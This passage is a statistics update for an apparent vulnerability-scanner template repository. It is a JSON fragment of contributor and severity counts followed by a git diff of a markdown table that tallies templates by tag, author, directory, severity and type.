kundu","count":1},{"name":"0xteles","count":1},{"name":"b4uh0lz","count":1},{"name":"exploitation","count":1},{"name":"noamrathaus","count":1},{"name":"arall","count":1},{"name":"mah3sec_","count":1},{"name":"r3nz0","count":1},{"name":"domenicoveneziano","count":1},{"name":"cbadke","count":1},{"name":"chetgan","count":1},{"name":"jfbes","count":1},{"name":"rodnt","count":1},{"name":"archer","count":1},{"name":"axrk","count":1},{"name":"guax1","count":1},{"name":"jaimin gondaliya","count":1},{"name":"arqsz","count":1},{"name":"_c0wb0y_","count":1},{"name":"lethargynavigator","count":1},{"name":"pratik khalane","count":1},{"name":"bjhulst","count":1},{"name":"ap3r","count":1},{"name":"furkansenan","count":1},{"name":"x6263","count":1},{"name":"freakyclown","count":1},{"name":"adilsoybali","count":1},{"name":"duty_1g","count":1},{"name":"absshax","count":1},{"name":"yashanand155","count":1},{"name":"none","count":1},{"name":"omarjezi","count":1},{"name":"booboohq","count":1},{"name":"notsoevilweasel","count":1},{"name":"millermedia","count":1},{"name":"marcos_iaf","count":1},{"name":"aringo-bf","count":1},{"name":"charanrayudu","count":1},{"name":"carrot2","count":1},{"name":"aravind","count":1},{"name":"palanichamy_perumal","count":1},{"name":"af001","count":1},{"name":"willd96","count":1},{"name":"izn0u","count":1},{"name":"petruknisme","count":1},{"name":"hexcat","count":1},{"name":"diablo","count":1},{"name":"mlec","count":1},{"name":"dk999","count":1},{"name":"hczdmr","count":1},{"name":"fur1na","count":1},{"name":"intx0x80","count":1},{"name":"abbas.heybati","count":1},{"name":"irshadahamed","count":1},{"name":"akokonunes","count":1},{"name":"viondexd","count":1},{"name":"kiks7","count":1},{"name":"mukundbhuva","count":1},{"name":"nagli","count":1},{"name":"luqman","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"whotwagner","count":1},{"name":"whynotke","count":1},{"name":"tirtha","count":1},{"name":"jonathanwalker","count":1},{"name":"undefl0w","count":1},{"name":"jas37","count":1},{"name":"compr00t","count":1},{"name":"fmunozs","count":1},{"name":"bugvsme","count":1},{"name":"danigoland","count":1},{"name":"mammad_rahimzada","count":1},{"name":"breno_css","count":1},{"name":"w0tx","count":1},{"name":"0xceba","count":1},{"name":"alperenkesk","count":1},{"name":"kiransau","count":1},{"name":"shiar","count":1},{"name":"unp4ck","count":1},{"name":"w8ay","count":1},{"name":"aayush vishnoi","count":1},{"name":"wlayzz","count":1},{"name":"banana69","count":1},{"name":"caon","count":1},{"name":"noah @thesubtlety","count":1},{"name":"becivells","count":1},{"name":"r3s ost","count":1},{"name":"higor melgaço","count":1},{"name":"xc1ym","count":1},{"name":"esonhugh","count":1},{"name":"sttlr","count":1},{"name":"iphantasmic","count":1},{"name":"brabbit10","count":1},{"name":"petergrifin","count":1},{"name":"therealtoastycat","count":1},{"name":"h4kux","count":1},{"name":"topscoder","count":1},{"name":"jcockhren","count":1},{"name":"lbb","count":1},{"name":"evolutionsec","count":1},{"name":"thebinitghimire","count":1},{"name":"0ut0fb4nd","count":1},{"name":"ramondunker","count":1},{"name":"droberson","count":1},{"name":"1nf1n7y","count":1},{"name":"unknown","count":1},{"name":"infosecsanyam","count":1},{"name":"_harleo","count":1},{"name":"d4ly","count":1},{"name":"hanlaomo","count":1},{"name":"puben","count":1},{"name":"ndmalc","count":1},{"name":"official_blackhat13","count":1},{"name":"act1on3","count":1},{"name":"ringo","count":1},{"name":"deena","count":1},{"name":"wpsec","count":1},{"name":"open-sec","count":1},{"name":"ola456","count":1},{"name":"amanrawat","count":1},{"name":"kailashbohara","count":1},{"name":"lrtk-coder","count":1},{"name":"patralos","count":1},{"name":"igibanez","count":1},{"name":"smaranchand","count":1},{"name":"ahmed sherif","count":1},{"name":"0h1in9e","count":1},{"name":"micha3lb3n","count":1},{"name":"houdinis","count":1},{"name":"erethon","count":1},{"name":"jaskaran","count":1},{"name":"carson chan","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"akash.c","count":1},{"name":"wabafet","count":1},{"name":"0xtavian","count":1},{"name":"thirukrishnan","count":1},{"name":"dievus","count":1},{"name":"ofjaaah","count":1},{"name":"hakluke","count":1},{"name":"majidmc2","count":1},{"name":"viniciuspereiras","count":1},{"name":"dwbzn","count":1},{"name":"tea","count":1},{"name":"hateshape","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"sorrowx3","count":1},{"name":"arr0way","count":1},{"name":"aron molnar","count":1},{"name":"retr02332","count":1},{"name":"qianbenhyu","count":1},{"name":"harshinsecurity","count":1},{"name":"apt-mirror","count":1},{"name":"matt miller","count":1},{"name":"floriandewald","count":1},{"name":"akshansh","count":1},{"name":"0xrod","count":1},{"name":"hotpot","count":1},{"name":"skylark-lab","count":1},{"name":"hazana","count":1},{"name":"aresx","count":1},{"name":"myst7ic","count":1},{"name":"ooooooo_q","count":1},{"name":"bywalks","count":1},{"name":"aaronchen0","count":1},{"name":"mchklt","count":1},{"name":"0xparth","count":1},{"name":"ayadi","count":1},{"name":"rumble773","count":1},{"name":"shockwave","count":1},{"name":"zhenwarx","count":1},{"name":"babybash","count":1},{"name":"jteles","count":1},{"name":"sdcampbell","count":1},{"name":"k3rwin","count":1},{"name":"mabdullah22","count":1},{"name":"arjunchandarana","count":1},{"name":"luqmaan hadia","count":1},{"name":"paper-pen","count":1},{"name":"hlop","count":1},{"name":"qlkwej","count":1},{"name":"savik","count":1},{"name":"ky9oss","count":1},{"name":"djoevanka","count":1},{"name":"rotemreiss","count":1},{"name":"flag007","count":1},{"name":"tirtha_mandal","count":1},{"name":"hyunsoo-ds","count":1},{"name":"jeya seelan","count":1},{"name":"lady_bug","count":1},{"name":"lark lab","count":1},{"name":"natto97","count":1},{"name":"jrolf","count":1},{"name":"alex","count":1},{"name":"miryangjung","count":1},{"name":"davidfegyver","count":1},{"name":"mayankpandey01","count":1},{"name":"luciannitescu","count":1},{"name":"sshell","count":1},{"name":"west-wise","count":1},{"name":"sinsinology","count":1},{"name":"sherlocksecurity","count":1},{"name":"shivanshkhari","count":1},{"name":"sickwell","count":1},{"name":"oscarintherocks","count":1},{"name":"bartu utku sarp","count":1},{"name":"juicypotato1","count":1},{"name":"p-l-","count":1},{"name":"yusakie","count":1},{"name":"elder tao","count":1},{"name":"imhunterand","count":1},{"name":"stupidfish","count":1},{"name":"dali","count":1},{"name":"screamy","count":1},{"name":"denandz","count":1},{"name":"phillipo","count":1},{"name":"nytr0gen","count":1},{"name":"unkl4b","count":1},{"name":"evan rubinstien","count":1},{"name":"daffianfo","count":1},{"name":"mubassirpatel","count":1},{"name":"s1r1us","count":1},{"name":"queencitycyber","count":1},{"name":"f1she3","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"kurohost","count":1},{"name":"aaban solutions","count":1},{"name":"olewagner","count":1},{"name":"regala_","count":1},{"name":"exid","count":1},{"name":"blckraven","count":1},{"name":"nielsing","count":1},{"name":"lingtren","count":1},{"name":"mordavid","count":1},{"name":"0xd0ff9","count":1},{"name":"xstp","count":1},{"name":"orpheus","count":1},{"name":"carlosvieira","count":1},{"name":"gpiechnik2","count":1},{"name":"pphuahua","count":1},{"name":"jc175","count":1},{"name":"momen eldawakhly","count":1},{"name":"pwnwithlove","count":1},{"name":"nobody","count":1},{"name":"elitebaz","count":1},{"name":"5up3r541y4n","count":1},{"name":"yuansec","count":1},{"name":"michal-mikolas","count":1},{"name":"ilovebinbash","count":1},{"name":"schniggie","count":1},{"name":"pjborah","count":1},{"name":"sanineng","count":1},{"name":"husain","count":1},{"name":"kresec","count":1},{"name":"ahmed abou-ela","count":1},{"name":"dorkerdevil","count":1},{"name":"berkdusunur","count":1},{"name":"zinminphy0","count":1},{"name":"push4d","count":1},{"name":"0xkayala","count":1},{"name":"miroslavsotak","count":1},{"name":"amnotacat","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"2rs3c","count":1},{"name":"tehtbl","count":1},{"name":"brianlam38","count":1},{"name":"barthy.koeln","count":1},{"name":"couskito","count":1},{"name":"dawid-czarnecki","count":1},{"name":"tim_koopmans","count":1},{"name":"yaser_s","count":1},{"name":"m0ck3d","count":1},{"name":"adrianmf","count":1},{"name":"eremit4","count":1},{"name":"j33n1k4","count":1},{"name":"pdp","count":1},{"name":"mhdsamx","count":1},{"name":"jeya.seelan","count":1},{"name":"kchason","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"liquidsec","count":1},{"name":"sicksec","count":1},{"name":"spac3wh1te","count":1},{"name":"fopina","count":1},{"name":"high","count":1},{"name":"anonymous","count":1},{"name":"daviey","count":1},{"name":"rubina119","count":1},{"name":"pussycat0","count":1},{"name":"shivampand3y","count":1},{"name":"naglis","count":1},{"name":"xcapri","count":1},{"name":"godfatherorwa","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"lixts","count":1},{"name":"professorabhay","count":1},{"name":"danfaizer","count":1},{"name":"chesterblue","count":1},{"name":"makyotox","count":1},{"name":"adamparsons","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"harryha","count":1},{"name":"borna nematzadeh","count":1},{"name":"0xcharan","count":1},{"name":"vulnspace","count":1},{"name":"ynnirc","count":1},{"name":"anon-artist","count":1},{"name":"dmartyn","count":1},{"name":"sec_hawk","count":1},{"name":"bjxsec","count":1},{"name":"unblvr1","count":1},{"name":"technicaljunkie","count":1},{"name":"numan türle","count":1},{"name":"am0nt31r0","count":1},{"name":"dhiyanesdk","count":1},{"name":"mbmy","count":1},{"name":"michael wedl","count":1},{"name":"yashgoti","count":1},{"name":"gonski","count":1},{"name":"prettyboyaaditya","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"iampritam","count":1},{"name":"calumjelrick","count":1},{"name":"0xprial","count":1},{"name":"cravaterouge","count":1},{"name":"b0yd","count":1},{"name":"marcio mendes","count":1},{"name":"gboddin","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"mayank_pandey01","count":1},{"name":"youngpope","count":1},{"name":"watchtowr","count":1},{"name":"co0nan","count":1},{"name":"0xh7ml","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"alexrydzak","count":1},{"name":"mrcl0wnlab","count":1},{"name":"shreyapohekar","count":1},{"name":"thelicato","count":1},{"name":"ptonewreckin","count":1},{"name":"jub0bs","count":1},{"name":"ohlinge","count":1},{"name":"notwhy","count":1},{"name":"ruppde","count":1},{"name":"h4sh5","count":1},{"name":"erikowen","count":1},{"name":"exceed","count":1},{"name":"adnanekhan","count":1},{"name":"zandros0","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"zsusac","count":1},{"name":"vinit989","count":1},{"name":"ledoubletake","count":1},{"name":"secthebit","count":1},{"name":"juliosmelo","count":1},{"name":"clment cruchet","count":1},{"name":"narluin","count":1},{"name":"ipanda","count":1},{"name":"omranisecurity","count":1},{"name":"mantissts","count":1},{"name":"yavolo","count":1},{"name":"rojanrijal","count":1},{"name":"ldionmarcil","count":1},{"name":"philippdelteil","count":1},{"name":"pry0cc","count":1},{"name":"joaonevess","count":1},{"name":"b0rn2r00t","count":1},{"name":"realexp3rt","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"pudsec","count":1},{"name":"httpvoid","count":1},{"name":"ok_bye_now","count":1},{"name":"ahmetpergamum","count":1},{"name":"manuelbua","count":1},{"name":"bughuntersurya","count":1},{"name":"justmumu","count":1},{"name":"knassar702","count":1},{"name":"xshuden","count":1},{"name":"th3.d1p4k","count":1},{"name":"metascan","count":1},{"name":"nerrorsec","count":1},{"name":"phyr3wall","count":1},{"name":"f0xy","count":1},{"name":"win3zz","count":1},{"name":"kabirsuda","count":1},{"name":"remonsec","count":1},{"name":"dale clarke","count":1},{"name":"rinolock","count":1},{"name":"udyz","count":1},{"name":"jbertman","count":1},{"name":"allenwest24","count":1},{"name":"affix","count":1},{"name":"pepitoh","count":1},{"name":"manasmbellani","count":1},{"name":"invisiblethreat","count":1},{"name":"omarkurt","count":1},{"name":"chron0x","count":1},{"name":"_darrenmartyn","count":1},{"name":"kareemse1im","count":1},{"name":"un-fmunozs","count":1},{"name":"mariam tariq","count":1},{"name":"jacalynli","count":1},{"name":"byobin","count":1},{"name":"jna1","count":1},{"name":"hakimkt","count":1},{"name":"ph33rr","count":1},{"name":"jiheon-dev","count":1},{"name":"nuts7","count":1},{"name":"shiva (strobes security)","count":1},{"name":"noobexploiter","count":1},{"name":"patrick pirker","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"th3r4id","count":1},{"name":"zn9988","count":1},{"name":"pascalheidmann","count":1},{"name":"lamscun","count":1},{"name":"ramkrishna sawant","count":1}],"directory":[{"name":"http","count":7477},{"name":"file","count":337},{"name":"workflows","count":191},{"name":"network","count":135},{"name":"cloud","count":98},{"name":"code","count":81},{"name":"javascript","count":57},{"name":"ssl","count":29},{"name":"dns","count":22},{"name":"dast","count":21},{"name":"headless","count":11},{"name":"cves.json","count":1},{"name":"contributors.json","count":1},{"name":"TEMPLATES-STATS.json","count":1}],"severity":[{"name":"info","count":3683},{"name":"high","count":1728},{"name":"medium","count":1520},{"name":"critical","count":1035},{"name":"low","count":263},{"name":"unknown","count":39}],"types":[{"name":"file","count":337},{"name":"dns","count":25}]}
diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md
index f92c10ea69..2224519a71 100644
--- a/TEMPLATES-STATS.md
+++ b/TEMPLATES-STATS.md
@@ -1,5293 +1,5410 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-------------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------|
-| cve | 2425 | dhiyaneshdk | 1251 | http | 7306 | info | 3621 | file | 337 |
-| panel | 1108 | daffainfo | 864 | file | 337 | high | 1635 | dns | 24 |
-| wordpress | 959 | dwisiswant0 | 803 | workflows | 191 | medium | 1473 | | |
-| xss | 895 | pikpikcu | 353 | network | 136 | critical | 981 | | |
-| exposure | 894 | pussycat0x | 345 | code | 80 | low | 258 | | |
-| wp-plugin | 834 | ritikchaddha | 320 | javascript | 55 | unknown | 36 | | |
-| osint | 803 | pdteam | 296 | ssl | 28 | | | | |
-| tech | 670 | ricardomaia | 232 | dns | 21 | | | | |
-| lfi | 647 | geeknik | 229 | dast | 21 | | | | |
-| edb | 598 | theamanrawat | 223 | headless | 11 | | | | |
-| misconfig | 596 | r3y3r53 | 200 | cloud | 9 | | | | |
-| rce | 584 | 0x_akoko | 179 | cves.json | 1 | | | | |
-| packetstorm | 526 | princechaddha | 171 | TEMPLATES-STATS.json | 1 | | | | |
-| cve2021 | 491 | gy741 | 158 | contributors.json | 1 | | | | |
-| wpscan | 486 | rxerium | 138 | | | | | | |
-| cve2022 | 474 | sleepingbag945 | 132 | | | | | | |
-| wp | 408 | arafatansari | 119 | | | | | | |
-| unauth | 359 | righettod | 114 | | | | | | |
-| cve2023 | 346 | tess | 109 | | | | | | |
-| file | 346 | pdresearch | 75 | | | | | | |
-| authenticated | 341 | madrobot | 65 | | | | | | |
-| sqli | 339 | zzeitlin | 64 | | | | | | |
-| intrusive | 295 | idealphase | 63 | | | | | | |
-| kev | 270 | iamnoooob | 63 | | | | | | |
-| cve2020 | 257 | akincibor | 59 | | | | | | |
-| token-spray | 243 | rootxharsh | 56 | | | | | | |
-| login | 237 | for3stco1d | 55 | | | | | | |
-| detect | 232 | philippedelteil | 48 | | | | | | |
-| config | 218 | gaurang | 42 | | | | | | |
-| oast | 218 | edoardottt | 41 | | | | | | |
-| top-200 | 215 | johnk3r | 39 | | | | | | |
+| cve | 2490 | dhiyaneshdk | 1289 | http | 7477 | info | 3683 | file | 337 |
+| panel | 1145 | daffainfo | 864 | file | 337 | high | 1728 | dns | 25 |
+| wordpress | 976 | dwisiswant0 | 803 | workflows | 191 | medium | 1520 | | |
+| exposure | 916 | pussycat0x | 354 | network | 135 | critical | 1035 | | |
+| xss | 906 | pikpikcu | 353 | cloud | 98 | low | 263 | | |
+| wp-plugin | 847 | ritikchaddha | 346 | code | 81 | unknown | 39 | | |
+| osint | 804 | pdteam | 297 | javascript | 57 | | | | |
+| tech | 682 | princechaddha | 269 | ssl | 29 | | | | |
+| lfi | 658 | ricardomaia | 232 | dns | 22 | | | | |
+| misconfig | 620 | geeknik | 231 | dast | 21 | | | | |
+| edb | 599 | theamanrawat | 223 | headless | 11 | | | | |
+| rce | 594 | r3y3r53 | 200 | contributors.json | 1 | | | | |
+| packetstorm | 530 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | |
+| wpscan | 497 | gy741 | 158 | cves.json | 1 | | | | |
+| cve2021 | 491 | rxerium | 142 | | | | | | |
+| cve2022 | 476 | righettod | 141 | | | | | | |
+| wp | 421 | sleepingbag945 | 132 | | | | | | |
+| cve2023 | 374 | arafatansari | 118 | | | | | | |
+| unauth | 366 | tess | 109 | | | | | | |
+| sqli | 357 | pdresearch | 82 | | | | | | |
+| file | 346 | iamnoooob | 69 | | | | | | |
+| authenticated | 341 | idealphase | 66 | | | | | | |
+| intrusive | 300 | madrobot | 65 | | | | | | |
+| detect | 283 | zzeitlin | 64 | | | | | | |
+| login | 276 | rootxharsh | 62 | | | | | | |
+| kev | 268 | akincibor | 59 | | | | | | |
+| cve2020 | 257 | for3stco1d | 55 | | | | | | |
+| token-spray | 243 | philippedelteil | 53 | | | | | | |
+| oast | 222 | gaurang | 42 | | | | | | |
+| config | 221 | edoardottt | 42 | | | | | | |
+| top-200 | 215 | johnk3r | 41 | | | | | | |
+| default-login | 212 | c-sh0 | 35 | | | | | | |
| osint-social | 210 | j4vaovo | 35 | | | | | | |
-| default-login | 204 | c-sh0 | 35 | | | | | | |
| token | 193 | adam crosser | 31 | | | | | | |
-| | 191 | luisfelipe146 | 31 | | | | | | |
-| network | 190 | pwnhxl | 28 | | | | | | |
-| apache | 188 | ice3man | 28 | | | | | | |
-| cve2018 | 169 | hardik-solanki | 24 | | | | | | |
-| iot | 166 | organiccrap | 24 | | | | | | |
-| cve2019 | 164 | ctflearner | 23 | | | | | | |
+| | 192 | luisfelipe146 | 31 | | | | | | |
+| network | 192 | mastercho | 29 | | | | | | |
+| apache | 189 | ice3man | 29 | | | | | | |
+| devops | 176 | pwnhxl | 28 | | | | | | |
+| cve2018 | 169 | organiccrap | 24 | | | | | | |
+| iot | 166 | hardik-solanki | 24 | | | | | | |
+| cve2019 | 165 | techbrunchfr | 23 | | | | | | |
| keys | 155 | harsh | 23 | | | | | | |
-| joomla | 148 | techbrunchfr | 23 | | | | | | |
-| malware | 141 | ffffffff0x | 22 | | | | | | |
-| redirect | 133 | mastercho | 22 | | | | | | |
-| auth-bypass | 125 | cckuailong | 18 | | | | | | |
-| ssrf | 118 | parthmalhotra | 18 | | | | | | |
-| phishing | 117 | sullo | 18 | | | | | | |
-| files | 112 | lu4nx | 16 | | | | | | |
-| cve2010 | 112 | random-robbie | 16 | | | | | | |
-| cve2017 | 110 | 0xpugazh | 16 | | | | | | |
-| router | 108 | shaikhyaser | 16 | | | | | | |
-| cms | 107 | pr3r00t | 15 | | | | | | |
-| install | 105 | sheikhrishad | 15 | | | | | | |
-| top-100 | 100 | unapibageek | 15 | | | | | | |
-| disclosure | 87 | dogasantos | 14 | | | | | | |
-| devops | 87 | milo2012 | 14 | | | | | | |
-| linux | 83 | tenbird | 14 | | | | | | |
-| code | 80 | r3dg33k | 14 | | | | | | |
-| privesc | 79 | bhutch | 14 | | | | | | |
-| local | 79 | melbadry9 | 13 | | | | | | |
-| tokens | 78 | nullfuzz | 13 | | | | | | |
-| seclists | 77 | theabhinavgaur | 13 | | | | | | |
-| takeover | 74 | sharath | 13 | | | | | | |
-| fileupload | 71 | elsfa7110 | 13 | | | | | | |
-| oracle | 70 | 0ri2n | 13 | | | | | | |
-| oss | 67 | meme-lord | 12 | | | | | | |
-| cisco | 66 | kazet | 12 | | | | | | |
-| adobe | 62 | suman_kar | 12 | | | | | | |
-| js | 61 | cyllective | 11 | | | | | | |
-| ir | 60 | wdahlenb | 11 | | | | | | |
-| huntr | 59 | nadino | 10 | | | | | | |
-| cve2015 | 58 | 0x240x23elu | 10 | | | | | | |
+| joomla | 148 | ctflearner | 23 | | | | | | |
+| malware | 142 | ffffffff0x | 22 | | | | | | |
+| redirect | 135 | parthmalhotra | 20 | | | | | | |
+| aws | 133 | cckuailong | 18 | | | | | | |
+| cloud | 132 | kazgangap | 18 | | | | | | |
+| auth-bypass | 131 | sullo | 18 | | | | | | |
+| ssrf | 119 | bhutch | 17 | | | | | | |
+| install | 118 | 0xpugazh | 16 | | | | | | |
+| phishing | 117 | shaikhyaser | 16 | | | | | | |
+| amazon | 116 | lu4nx | 16 | | | | | | |
+| files | 113 | random-robbie | 16 | | | | | | |
+| cve2010 | 112 | sheikhrishad | 15 | | | | | | |
+| cms | 112 | pr3r00t | 15 | | | | | | |
+| cve2017 | 110 | unapibageek | 15 | | | | | | |
+| router | 108 | r3dg33k | 14 | | | | | | |
+| top-100 | 100 | milo2012 | 14 | | | | | | |
+| disclosure | 89 | tenbird | 14 | | | | | | |
+| aws-cloud-config | 89 | dogasantos | 14 | | | | | | |
+| linux | 83 | userdehghani | 14 | | | | | | |
+| code | 81 | nullfuzz | 13 | | | | | | |
+| local | 80 | theabhinavgaur | 13 | | | | | | |
+| privesc | 79 | sharath | 13 | | | | | | |
+| seclists | 79 | melbadry9 | 13 | | | | | | |
+| takeover | 79 | 0ri2n | 13 | | | | | | |
+| tokens | 78 | elsfa7110 | 13 | | | | | | |
+| fileupload | 76 | meme-lord | 12 | | | | | | |
+| oracle | 71 | suman_kar | 12 | | | | | | |
+| cve2024 | 69 | kazet | 12 | | | | | | |
+| oss | 67 | cyllective | 11 | | | | | | |
+| cisco | 66 | wdahlenb | 11 | | | | | | |
+| js | 63 | alph4byt3 | 10 | | | | | | |
+| adobe | 62 | nadino | 10 | | | | | | |
+| ir | 61 | 0x240x23elu | 10 | | | | | | |
+| huntr | 59 | hackergautam | 10 | | | | | | |
+| cve2015 | 59 | random_robbie | 10 | | | | | | |
+| atlassian | 57 | logicalhunter | 10 | | | | | | |
| cve2016 | 57 | co5mos | 10 | | | | | | |
-| atlassian | 57 | alph4byt3 | 10 | | | | | | |
-| vmware | 56 | logicalhunter | 10 | | | | | | |
-| google | 56 | random_robbie | 10 | | | | | | |
-| enum | 55 | hackergautam | 10 | | | | | | |
-| c2 | 54 | momika233 | 9 | | | | | | |
-| tenable | 48 | adamcrosser | 9 | | | | | | |
-| logs | 48 | initstring | 9 | | | | | | |
-| log4j | 47 | oppsec | 9 | | | | | | |
-| hackerone | 46 | olearycrew | 9 | | | | | | |
-| vulhub | 46 | fabaff | 9 | | | | | | |
-| aem | 45 | emadshanab | 9 | | | | | | |
-| osint-gaming | 45 | noraj | 8 | | | | | | |
-| cve2014 | 44 | zh | 8 | | | | | | |
-| jndi | 44 | veshraj | 8 | | | | | | |
-| debug | 44 | _0xf4n9x_ | 8 | | | | | | |
-| aws | 44 | aashiq | 8 | | | | | | |
-| cloud | 43 | iamthefrogy | 8 | | | | | | |
-| deserialization | 43 | irshad ahamed | 8 | | | | | | |
-| php | 43 | that_juan_ | 8 | | | | | | |
+| enum | 56 | initstring | 9 | | | | | | |
+| google | 56 | emadshanab | 9 | | | | | | |
+| vmware | 56 | olearycrew | 9 | | | | | | |
+| c2 | 55 | momika233 | 9 | | | | | | |
+| logs | 48 | adamcrosser | 9 | | | | | | |
+| tenable | 48 | oppsec | 9 | | | | | | |
+| log4j | 47 | fabaff | 9 | | | | | | |
+| hackerone | 46 | that_juan_ | 8 | | | | | | |
+| vulhub | 46 | aashiq | 8 | | | | | | |
+| aem | 45 | noraj | 8 | | | | | | |
+| osint-gaming | 45 | _0xf4n9x_ | 8 | | | | | | |
+| php | 44 | veshraj | 8 | | | | | | |
+| jndi | 44 | zh | 8 | | | | | | |
+| cve2014 | 44 | irshad ahamed | 8 | | | | | | |
+| debug | 44 | iamthefrogy | 8 | | | | | | |
+| deserialization | 43 | divya_mudgal | 7 | | | | | | |
+| osint-porn | 42 | leovalcante | 7 | | | | | | |
+| traversal | 42 | nodauf | 7 | | | | | | |
| oa | 42 | caspergn | 7 | | | | | | |
-| plugin | 42 | harshbothra_ | 7 | | | | | | |
-| traversal | 42 | leovalcante | 7 | | | | | | |
-| osint-porn | 42 | techryptic (@tech) | 7 | | | | | | |
-| generic | 42 | kophjager007 | 7 | | | | | | |
-| osint-hobby | 42 | huta0 | 7 | | | | | | |
-| springboot | 41 | randomstr1ng | 7 | | | | | | |
-| microsoft | 39 | nodauf | 7 | | | | | | |
-| misc | 39 | divya_mudgal | 7 | | | | | | |
-| cnvd | 39 | dr_set | 7 | | | | | | |
-| injection | 38 | me_dheeraj | 7 | | | | | | |
+| generic | 42 | me_dheeraj | 7 | | | | | | |
| | | (https://twitter.com/dheerajmadhukar) | | | | | | | |
-| jira | 37 | amit-jd | 7 | | | | | | |
-| listing | 37 | its0x08 | 7 | | | | | | |
-| kubernetes | 37 | tarunkoyalwar | 7 | | | | | | |
-| cve2024 | 36 | hahwul | 6 | | | | | | |
-| ibm | 36 | imnightmaree | 6 | | | | | | |
-| cti | 36 | forgedhallpass | 6 | | | | | | |
-| osint-misc | 35 | justaacat | 6 | | | | | | |
-| sap | 34 | puzzlepeaches | 6 | | | | | | |
-| fuzz | 33 | evan rubinstein | 6 | | | | | | |
-| miscellaneous | 32 | __fazal | 6 | | | | | | |
-| osint-tech | 31 | ja1sh | 6 | | | | | | |
-| osint-coding | 30 | pentest_swissky | 6 | | | | | | |
-| ssl | 29 | praetorian-thendrickson | 6 | | | | | | |
-| amazon | 28 | clem9669 | 6 | | | | | | |
-| wp-theme | 28 | devang-solanki | 6 | | | | | | |
-| gitlab | 28 | byt3bl33d3r | 6 | | | | | | |
-| tls | 28 | megamansec | 6 | | | | | | |
-| k8s | 28 | gitlab red team | 6 | | | | | | |
-| api | 27 | pathtaga | 6 | | | | | | |
-| dlink | 27 | xelkomy | 6 | | | | | | |
-| bestwebsoft | 27 | powerexploit | 5 | | | | | | |
-| fortinet | 27 | shine | 5 | | | | | | |
-| cve2012 | 26 | andreluna | 5 | | | | | | |
-| ssh | 26 | r3naissance | 5 | | | | | | |
-| proxy | 25 | your3cho | 5 | | | | | | |
-| citrix | 25 | mr-xn | 5 | | | | | | |
-| zohocorp | 25 | yanyun | 5 | | | | | | |
-| manageengine | 25 | lucky0x0d | 5 | | | | | | |
-| weaver | 25 | gtrrnr | 5 | | | | | | |
-| firewall | 25 | joanbono | 5 | | | | | | |
-| osint-shopping | 24 | panch0r3d | 5 | | | | | | |
-| osint-finance | 24 | r12w4n | 5 | | | | | | |
-| osint-images | 24 | ganofins | 5 | | | | | | |
-| lfr | 24 | arm!tage | 5 | | | | | | |
-| zoho | 24 | s0obi | 5 | | | | | | |
-| admin | 24 | podalirius | 5 | | | | | | |
-| osint-business | 24 | vicrack | 5 | | | | | | |
-| tomcat | 23 | defr0ggy | 5 | | | | | | |
-| xxe | 23 | robotshell | 5 | | | | | | |
-| audit | 23 | prajiteshsingh | 5 | | | | | | |
-| yonyou | 23 | kh4sh3i | 5 | | | | | | |
-| dns | 23 | scent2d | 4 | | | | | | |
-| stored-xss | 23 | lum8rjack | 4 | | | | | | |
-| file-upload | 23 | 0xr2r | 4 | | | | | | |
-| cicd | 22 | cookiehanhoan | 4 | | | | | | |
-| printer | 21 | iamnooob | 4 | | | | | | |
-| ecology | 21 | wisnupramoedya | 4 | | | | | | |
+| plugin | 42 | amit-jd | 7 | | | | | | |
+| osint-hobby | 42 | huta0 | 7 | | | | | | |
+| springboot | 41 | kophjager007 | 7 | | | | | | |
+| cnvd | 40 | its0x08 | 7 | | | | | | |
+| misc | 39 | techryptic (@tech) | 7 | | | | | | |
+| microsoft | 38 | dr_set | 7 | | | | | | |
+| injection | 38 | randomstr1ng | 7 | | | | | | |
+| jira | 37 | tarunkoyalwar | 7 | | | | | | |
+| listing | 37 | harshbothra_ | 7 | | | | | | |
+| kubernetes | 37 | gitlab red team | 6 | | | | | | |
+| ibm | 36 | evan rubinstein | 6 | | | | | | |
+| cti | 36 | __fazal | 6 | | | | | | |
+| osint-misc | 35 | clem9669 | 6 | | | | | | |
+| sap | 34 | pathtaga | 6 | | | | | | |
+| ssl | 33 | forgedhallpass | 6 | | | | | | |
+| fuzz | 33 | megamansec | 6 | | | | | | |
+| miscellaneous | 32 | pentest_swissky | 6 | | | | | | |
+| osint-tech | 31 | hahwul | 6 | | | | | | |
+| osint-coding | 30 | byt3bl33d3r | 6 | | | | | | |
+| tls | 30 | imnightmaree | 6 | | | | | | |
+| ec2 | 30 | puzzlepeaches | 6 | | | | | | |
+| wp-theme | 30 | ja1sh | 6 | | | | | | |
+| dlink | 30 | xelkomy | 6 | | | | | | |
+| k8s | 28 | praetorian-thendrickson | 6 | | | | | | |
+| api | 28 | devang-solanki | 6 | | | | | | |
+| gitlab | 28 | justaacat | 6 | | | | | | |
+| fortinet | 28 | kh4sh3i | 5 | | | | | | |
+| bestwebsoft | 27 | andreluna | 5 | | | | | | |
+| citrix | 27 | your3cho | 5 | | | | | | |
+| proxy | 27 | r3naissance | 5 | | | | | | |
+| firewall | 26 | defr0ggy | 5 | | | | | | |
+| cve2012 | 26 | s0obi | 5 | | | | | | |
+| lfr | 26 | joanbono | 5 | | | | | | |
+| ssh | 25 | vicrack | 5 | | | | | | |
+| weaver | 25 | panch0r3d | 5 | | | | | | |
+| manageengine | 25 | r12w4n | 5 | | | | | | |
+| zohocorp | 25 | gtrrnr | 5 | | | | | | |
+| zoho | 24 | powerexploit | 5 | | | | | | |
